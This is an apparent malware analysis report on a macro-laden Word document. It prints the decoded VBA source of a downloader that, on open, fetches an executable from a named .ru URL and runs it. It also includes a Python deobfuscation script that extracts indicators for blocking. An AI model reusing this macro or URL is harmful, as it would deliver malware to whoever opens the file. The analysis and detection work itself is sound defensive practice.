Verdict: MALICIOUS
Risk score: 90
Heuristics: 4
- VBA project inside OOXML (medium; 2 related findings) [OOXML_VBA]: the document contains a VBA project; VBA macros are present.
- URLDownloadToFile in VBA (critical) [OLE_VBA_DOWNLOADURL]: matched line in script: "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal _
- AutoOpen macro (low) [OLE_VBA_AUTOOPEN]: matched line in script: Public Sub AutoOpen()

Read together with the extracted source below, these findings describe a complete downloader chain: AutoOpen runs when the document is opened, calls urlmon!URLDownloadToFileA (declared under an obfuscated name) to fetch https://p0t6.jumevty.ru/972449655.exe into a file whose name, SystemDataExpressionParserW.exe, is assembled by stripping a padding token with Replace(), and then launches that file through kernel32!CreateProcessA. The CreateProcessA import is likewise hidden behind an obfuscated Declare alias but is not flagged by any of the heuristics above, so the critical download finding understates the sample: it downloads and executes.
Embedded URL (info) [EMBEDDED_URL]: one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
- https://p0t6.jumevty.ru/972449655.exeSystemComponentModelEventHandlerListL (referenced by macro). The trailing SystemComponentModelEventHandlerListL is the padding token the macro removes with Replace() before use; the URL actually requested is https://p0t6.jumevty.ru/972449655.exe, and that is the value to block or hunt for.
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (referenced by macro)
- http://schemas.microsoft.com/office/drawing/2014/chartex (referenced by macro)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartex (referenced by macro)
- http://schemas.openxmlformats.org/markup-compatibility/2006 (referenced by macro)
- http://schemas.openxmlformats.org/officeDocument/2006/relationships (referenced by macro)
- http://schemas.openxmlformats.org/officeDocument/2006/math (referenced by macro)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (referenced by macro)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (referenced by macro)
- http://schemas.openxmlformats.org/wordprocessingml/2006/main (referenced by macro)
- http://schemas.microsoft.com/office/word/2010/wordml (referenced by macro)
- http://schemas.microsoft.com/office/word/2012/wordml (referenced by macro)
- http://schemas.microsoft.com/office/word/2015/wordml/symex (referenced by macro)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (referenced by macro)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInk (referenced by macro)
- http://schemas.microsoft.com/office/word/2006/wordml (referenced by macro)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShape (referenced by macro)

The schemas.microsoft.com and schemas.openxmlformats.org entries are standard OOXML and Office XML namespace identifiers. They name schemas, are present in practically every Word document, and are not network indicators; the only URL on this list worth acting on is the jumevty.ru one.
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3791 bytes | e198236fce5a8c41b86fec05d4e6ab2a5fcd0f36a5b47a00ab9c36ab0e25b0cc |
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 15872 bytes | 3f79b5ca66ba4f7e1e447bd07b64ceaec7335bff4ec8e567aabd27be6bc58bec |

Preview of macros.bas (first 1,000 lines of the extracted script; olevba concatenates the ThisDocument and Module1 modules, which is why two VB_Name attributes appear):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Private Declare Function SystemRuntimeInteropServicesWindowsRuntimeICommandAdapterHelperscDisplayClassU Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal _
szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function SystemSecurityCryptographyCAPIBaseCMSGRECIPIENTENCRYPTEDKEYINFOB Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As SystemDataOleDbOleDbPropertyInfoD, lpProcessInformation As SystemComponentModelInitializationEventAttributen) As Long
Private Declare Sub MicrosoftSqlServerServerSmiParameterMetaDataU Lib "kernel32" Alias "GetStartupInfoA" (lpStartupInfo As SystemDataOleDbOleDbPropertyInfoD)
Option Explicit
Private Type SystemComponentModelInitializationEventAttributen
hProcess As Long
dwProcessId As Long
dwThreadId As Long
hThread As Long
End Type
Private Type SystemDataOleDbOleDbPropertyInfoD
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
hStdOutput As Long
hStdError As Long
cb As Long
lpReserved As Long
lpReserved2 As Byte
hStdInput As Long
lpDesktop As Long
lpTitle As Long
dwX As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwY As Long
dwXSize As Long
hStdOutput As Long
hStdError As Long
cb As Long
lpReserved As Long
End Type
Private Const SW_SHOWNORMAL As Long = 1
Private si As SystemDataOleDbOleDbPropertyInfoD
Private pi As SystemComponentModelInitializationEventAttributen
Dim ret
Dim das
Dim sas
Public Sub AutoOpen()
ret = 41
das = Replace("SystemComponentModelEventHandlerListLhttps://p0t6.jumevty.ru/972449655.exeSystemComponentModelEventHandlerListL", "SystemComponentModelEventHandlerListL", "")
sas = Replace("mNetTransportTypeOSystemDataExpressionParserW.emNetTransportTypeOxe", "mNetTransportTypeO", "")
ret = 43
ret = SystemRuntimeInteropServicesWindowsRuntimeICommandAdapterHelperscDisplayClassU(0, das, sas, 0, 0)
SystemNetUploadValuesCompletedEventHandlerx (sas)
End Sub
Public Function SystemNetUploadValuesCompletedEventHandlerx(Filename As String, Optional CommandLine As String)
Const STARTF_USESHOWWINDOW As Long = 1
Const NORMAL_PRIORITY_CLASS As Long = &H20
Dim n As Long
Dim lr As Long
Dim CmdLine As String
Dim argc As Long
Dim argv() As String
CmdLine = """" & Filename & """"
si.cb = Len(si)
MicrosoftSqlServerServerSmiParameterMetaDataU si
si.dwFlags = STARTF_USESHOWWINDOW
si.wShowWindow = SW_SHOWNORMAL
lr = SystemSecurityCryptographyCAPIBaseCMSGRECIPIENTENCRYPTEDKEYINFOB(vbNullString, _
CmdLine, _
ByVal 0, _
ByVal 0, _
False, _
NORMAL_PRIORITY_CLASS, _
ByVal 0, _
vbNullString, _
si, _
pi)
SystemNetUploadValuesCompletedEventHandlerx = lr
End Function
```

Two things to note when reading this listing. First, every Win32 import is hidden behind a Declare whose local name is a long .NET-style identifier (for example SystemRuntimeInteropServicesWindowsRuntimeICommandAdapterHelperscDisplayClassU is urlmon!URLDownloadToFileA, SystemSecurityCryptographyCAPIBaseCMSGRECIPIENTENCRYPTEDKEYINFOB is kernel32!CreateProcessA, and MicrosoftSqlServerServerSmiParameterMetaDataU is kernel32!GetStartupInfoA); the two Replace() calls strip padding tokens to yield the download URL and the output filename SystemDataExpressionParserW.exe, which is written relative to the current directory and then run with an empty lpApplicationName and the quoted path as lpCommandLine. Second, the decoded source as dumped would not compile unchanged: the STARTUPINFO-style Type declares hStdOutput, hStdError, cb and lpReserved twice, which VBA rejects as ambiguous member names. Office executes the compiled p-code stored in vbaProject_00.bin when the VBA version matches, so treat this listing as the decompressed source stream rather than as proof of exactly what ran, and hash and retain the .bin for any follow-up.
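The report's heuristics stop at "URLDownloadToFile present" and "AutoOpen present"; what an analyst actually wants from this sample is the real URL and filename hidden behind the Replace() padding and the real API names hidden behind the Declare aliases. The following Python script is an added example, not part of the analyzer or of oletools: it re-runs the two rule ids the report uses (OLE_VBA_AUTOOPEN, OLE_VBA_DOWNLOADURL) plus one hypothetical extra rule for process-launch imports, folds VBA line continuations, maps each obfuscated Declare name back to its library and exported symbol, evaluates all-literal Replace() calls, and rewrites the API calls with the recovered strings. The macro excerpt embedded in it is constructed from the listing above (the CreateProcessA Declare is shortened), and the rule id RULE_CREATEPROCESS is an assumption of this example.

```python
"""Re-derive the report's macro findings and unwind the Replace() string obfuscation.

Added example, not part of the analyzer's own code. Rule ids OLE_VBA_AUTOOPEN and
OLE_VBA_DOWNLOADURL are the report's; RULE_CREATEPROCESS is a hypothetical extra rule.
"""
import re
from urllib.parse import urlsplit

# Constructed excerpt of the decoded macro listed in the report: the API Declares,
# AutoOpen, and the launcher, with the VBA ' _' line continuations kept as dumped.
MACRO = r'''Private Declare Function SystemRuntimeInteropServicesWindowsRuntimeICommandAdapterHelperscDisplayClassU Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal _
szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function SystemSecurityCryptographyCAPIBaseCMSGRECIPIENTENCRYPTEDKEYINFOB Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String) As Long
Public Sub AutoOpen()
ret = 41
das = Replace("SystemComponentModelEventHandlerListLhttps://p0t6.jumevty.ru/972449655.exeSystemComponentModelEventHandlerListL", "SystemComponentModelEventHandlerListL", "")
sas = Replace("mNetTransportTypeOSystemDataExpressionParserW.emNetTransportTypeOxe", "mNetTransportTypeO", "")
ret = SystemRuntimeInteropServicesWindowsRuntimeICommandAdapterHelperscDisplayClassU(0, das, sas, 0, 0)
SystemNetUploadValuesCompletedEventHandlerx (sas)
End Sub
Public Function SystemNetUploadValuesCompletedEventHandlerx(Filename As String, Optional CommandLine As String)
CmdLine = """" & Filename & """"
lr = SystemSecurityCryptographyCAPIBaseCMSGRECIPIENTENCRYPTEDKEYINFOB(vbNullString, _
CmdLine, ByVal 0, ByVal 0, False, NORMAL_PRIORITY_CLASS, ByVal 0, vbNullString, si, pi)
SystemNetUploadValuesCompletedEventHandlerx = lr
End Function
'''

STR = r'"((?:[^"]|"")*)"'  # one VBA string literal; a doubled "" inside is an escaped quote
DECLARE = re.compile(r'Declare\s+(?:Function|Sub)\s+(\w+)\s+Lib\s+' + STR + r'\s+Alias\s+' + STR, re.I)
REPLACE = re.compile(r'^\s*(\w+)\s*=\s*Replace\(\s*' + STR + r'\s*,\s*' + STR + r'\s*,\s*' + STR + r'\s*\)',
                     re.I | re.M)

RULES = [  # (rule id, severity, whole-line pattern); first matching line is reported
    ("OLE_VBA_AUTOOPEN", "low",
     re.compile(r'^\s*(?:Public\s+|Private\s+)?Sub\s+(?:AutoOpen|Auto_Open|Document_Open|Workbook_Open)\b.*$',
                re.I | re.M)),
    ("OLE_VBA_DOWNLOADURL", "critical", re.compile(r'^.*\bURLDownloadToFile[AW]?\b.*$', re.I | re.M)),
    ("RULE_CREATEPROCESS", "high",  # hypothetical rule: process launch imported through a Declare alias
     re.compile(r'^.*Alias\s+"(?:CreateProcess[AW]|ShellExecute(?:Ex)?[AW]|WinExec)".*$', re.I | re.M)),
]


def unq(lit: str) -> str:
    """Undo VBA's doubled-quote escaping inside a string literal."""
    return lit.replace('""', '"')


def join_continuations(src: str) -> str:
    """Fold ' _' line continuations so each Declare and each call sits on one line."""
    return re.sub(r'[ \t]+_[ \t]*\r?\n[ \t]*', ' ', src)


def alias_map(src: str) -> dict:
    """Obfuscated Declare name -> (library, real exported API name)."""
    return {m.group(1): (m.group(2), unq(m.group(3))) for m in DECLARE.finditer(src)}


def unwind_replace(src: str) -> dict:
    """Evaluate `var = Replace("hay", "needle", "repl")` where all three arguments are literals.
    VBA's Replace defaults to a case-sensitive binary compare, which str.replace matches."""
    out = {}
    for m in REPLACE.finditer(src):
        out[m.group(1)] = unq(m.group(2)).replace(unq(m.group(3)), unq(m.group(4)))
    return out


def resolve_calls(src: str, aliases: dict, values: dict) -> list:
    """Rewrite calls to aliased Declares as lib!RealName(args), substituting recovered strings.
    Arguments are split on commas, which is enough for the flat calls in this sample."""
    calls = []
    for name, (lib, real) in aliases.items():
        for m in re.finditer(r'\b' + re.escape(name) + r'\s*\(([^()]*)\)', src):
            args = [a.strip() for a in m.group(1).split(',')] if m.group(1).strip() else []
            calls.append(f"{lib}!{real}({', '.join(repr(values[a]) if a in values else a for a in args)})")
    return calls


def recovered_urls(values: dict) -> list:
    """Only recovered strings that parse as absolute http(s) URLs count as network IOCs."""
    return sorted(v for v in values.values() if urlsplit(v).scheme in ("http", "https") and urlsplit(v).netloc)


def analyze(src: str) -> dict:
    src = join_continuations(src)
    aliases = alias_map(src)
    values = unwind_replace(src)
    return {
        "findings": [(rid, sev, rx.search(src).group(0).strip()) for rid, sev, rx in RULES if rx.search(src)],
        "aliases": {k: v[1] for k, v in aliases.items()},
        "strings": values,
        "calls": resolve_calls(src, aliases, values),
        "urls": recovered_urls(values),
    }


if __name__ == "__main__":
    for key, value in analyze(MACRO).items():
        print(key, value)
```

Running it prints the deobfuscated call `urlmon!URLDownloadToFileA(0, 'https://p0t6.jumevty.ru/972449655.exe', 'SystemDataExpressionParserW.exe', 0, 0)` followed by the `kernel32!CreateProcessA(...)` launch, which is the IOC pair (URL plus dropped filename) to feed into blocking and hunting. The Replace() evaluator deliberately handles only literal arguments; a sample that builds strings from Chr() or concatenation needs a small VBA expression evaluator instead, and a sample whose source stream has been stomped needs the p-code, not this listing.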